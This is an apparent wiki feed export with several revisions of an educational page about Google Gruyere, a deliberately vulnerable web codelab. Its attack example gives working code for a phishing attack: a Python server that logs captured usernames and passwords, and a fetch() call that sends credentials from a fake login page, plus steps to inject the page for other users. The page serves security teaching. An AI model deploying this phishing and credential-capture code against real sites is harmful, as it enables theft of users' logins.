    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&amp;lt;br&amp;gt;&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&amp;lt;br&amp;gt;&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
[[File:injection.png|thumb|none|400px|Injection]]&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 5: Start attack&amp;lt;/h3&amp;gt;&lt;br /&gt;
Your link will be available either on the homepage if you elevated your privileges, or on the &amp;quot;My Snippets&amp;quot; page.&lt;br /&gt;
Now start your server and wait for someone to fall into your trap.&lt;br /&gt;
[[File:MySnipptes.png|thumb|none|400px|MySnippets Page]]&lt;br /&gt;
[[File:LoginPage.png|thumb|none|400px|Malicious Login Page]]&lt;br /&gt;
[[File:PasswordLog.png|thumb|none|400px|Log File]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:PasswordLog.png&amp;diff=17652</id>
		<title>File:PasswordLog.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:PasswordLog.png&amp;diff=17652"/>
		<updated>2024-12-18T20:07:32Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:MySnippets.png&amp;diff=17651</id>
		<title>File:MySnippets.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:MySnippets.png&amp;diff=17651"/>
		<updated>2024-12-18T20:07:14Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:LoginPage.png&amp;diff=17649</id>
		<title>File:LoginPage.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:LoginPage.png&amp;diff=17649"/>
		<updated>2024-12-18T20:06:52Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17643</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17643"/>
		<updated>2024-12-18T19:51:26Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&amp;lt;br&amp;gt;&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&amp;lt;br&amp;gt;&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
[[File:injection.png|thumb|none|400px|Injection]]&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 5: Start attack&amp;lt;/h3&amp;gt;&lt;br /&gt;
Your link will be available either on the homepage if you elevated your privileges, or on the &amp;quot;My Snippets&amp;quot; page.&lt;br /&gt;
Now start your server and wait for someone to fall into your trap.&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17639</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17639"/>
		<updated>2024-12-18T19:48:07Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
